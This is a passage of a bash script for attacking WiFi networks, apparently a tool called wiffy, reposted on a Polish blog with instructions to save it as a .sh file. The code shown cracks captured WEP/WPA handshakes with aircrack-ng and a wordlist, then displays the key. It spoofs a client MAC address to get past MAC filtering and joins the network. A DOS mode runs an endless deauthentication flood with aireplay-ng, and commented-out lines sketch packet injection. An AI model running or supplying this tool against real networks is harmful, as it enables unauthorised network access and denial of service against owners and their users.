   if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Captured: Handshake" $diagnostics ; fi
   action "Killing programs" "killall xterm && sleep 1" $verbose $diagnostics "true"
  fi

  #----------------------------------------------------------------------------------------------#
  if [ "$encryption" == "WEP" ] || [ "$encryption" == "WPA" ] ; then
   display action "Starting: aircrack-ng" $diagnostics
   if [ "$encryption" == "WEP" ] ; then action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -e \"$essid\" -l /tmp/wiffy.key" $verbose $diagnostics "false" "0|350|30" ; fi
   if [ "$encryption" == "WPA" ] ; then action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -w $wordlist -e \"$essid\" -l /tmp/wiffy.key" $verbose $diagnostics "false" "0|0|20" ; fi
  fi

  #----------------------------------------------------------------------------------------------#
  action "Killing programs" "killall xterm && sleep 1" $verbose $diagnostics "true"
  action "airmon-ng" "airmon-ng stop $monitorInterface" $verbose $diagnostics "true"

  #----------------------------------------------------------------------------------------------#
  if [ -e "/tmp/wiffy.key" ] ; then
   key=$(cat /tmp/wiffy.key)
   display info "WiFi key: $key" $diagnostics
   #----------------------------------------------------------------------------------------------#
   if [ "$extras" == "true" ] ; then
     if [ "$client" != "$mac" ] ; then
      if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Spoofing): $client ('Helps' with MAC filtering) " $diagnostics ; fi
      action "airmon-ng" "ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up" $verbose $diagnostics "true"
     fi
     display action "Joining: $essid" $diagnostics
     if [ "$encryption" == "WEP" ] ; then
      action "i[f/w]config" "ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up" $verbose $diagnostics "true"
     elif [ "$encryption" == "WPA" ] ; then
      action "wpa_passphrase" "wpa_passphrase $essid '$key' > /tmp/wiffy.conf" $verbose $diagnostics "true"
      action "wpa_supplicant" "wpa_supplicant -B -i $interface -c /tmp/wiffy.conf -D wext" $verbose $diagnostics "true"
     fi
     sleep 5
     action "dhclient" "dhclient $interface" $verbose $diagnostics "true"
     if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then
      ourIP=$(ifconfig $interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}')
      display info "IP: $ourIP" $diagnostics
      #gateway=$(route -n | grep $interface | awk '/^0.0.0.0/ {getline; print $2}')
      #display info "Gateway: $gateway" $diagnostics
     fi
   fi
  #----------------------------------------------------------------------------------------------#
  elif [ "$encryption" == "WPA" ] ; then
   display error "WiFi Key not in wordlist" $diagnostics 1>&2
   display action "Moving handshake: $(pwd)/wiffy-$essid.cap" $diagnostics 1>&2
   action "Moving capture" "mv -f /tmp/wiffy*.cap $(pwd)/wiffy-$essid.cap" $verbose $diagnostics "true"
  #----------------------------------------------------------------------------------------------#
  elif [ "$encryption" != "N/A" ] ; then
   display error "Something went wrong )=" $diagnostics 1>&2
  fi


#----------------------------------------------------------------------------------------------#
elif [ "$mode" == "dos" ] ; then
  display action "Attack (DOS): $essid" $diagnostics
  command="aireplay-ng --deauth 0 -e \"$essid\" -a $bssid"
  if [ "$client" != "clientless" ] ; then command="$command -c $client" ; fi
  command="$command $monitorInterface"
  action "aireplay-ng (DeAuth)" "$command" $verbose $diagnostics "true" &

  #----------------------------------------------------------------------------------------------#
  display info "Attacking! ...press CTRL+C to stop" $diagnostics
  if [ "$diagnostics" == "true" ] ; then echo "-Ready!----------------------------------" >> $logFile ; fi
  for (( ; ; )) ; do
   sleep 5
  done
#elif [ "$mode" == "inject" ] ; then
#  display action "Attack (Inject): $essid" $diagnostics
#  if [ "$encryption" != "WEP" ] ; then display error "Only works on WEP networks" $diagnostics 1>&2 ; cleanup ; fi

  #action "aireplay-ng (Inject)" "airtun-ng -a $bssid $monitorInterface" $verbose $diagnostics "true" &
  #action "aireplay-ng (Inject)" "ifconfig at0 192.168.1.83 netmask 255.255.255.0 up" $verbose $diagnostics "true" &

  # airmon-ng start wlan0
  # /pentest/wireless/airpwn-1.4/airpwn -c conf/greet_html -d rt73 -i mon0 -v

  #----------------------------------------------------------------------------------------------#
#  display info "Attacking! ...press CTRL+C to stop" $diagnostics
#  if [ "$diagnostics" == "true" ] ; then echo "-Ready!----------------------------------" >> $logFile ; fi
#  for (( ; ; )) ; do
#   sleep 5
#  done
fi

#----------------------------------------------------------------------------------------------#
if [ "$diagnostics" == "true" ] ; then echo "-Done!---------------------------------------------------------------------------------------" >> $logFile ; fi
cleanup clean


#---Ideas--------------------------------------------------------------------------------------#
# WEP - Chopchop/FagmentationAP Packet Broadcast
# WPA - aircrack/coWPAtty
# WPA - brute / hash
# WPA - calculate hash
# WPA - use pre hash / use pre capture
# WPA - use folder for wordlist
# WiFi Key is in hex
# update - aircrack/coWPATTY
# decrypt packets - offline & online (airtun-ng)
# Mode - Injection - GET WORKING
# display error "The encryption ($encryption) on $essid isn't support" $diagnostics 1>&2 ; cleanup

W przypadku kopiowania powyższego skryptu należy go oczywiście zapisać w pliku o rozszerzeniu *.sh

Do pobrania
*Oczywiście nie moje źródełko. 🙂

Dodaj komentarz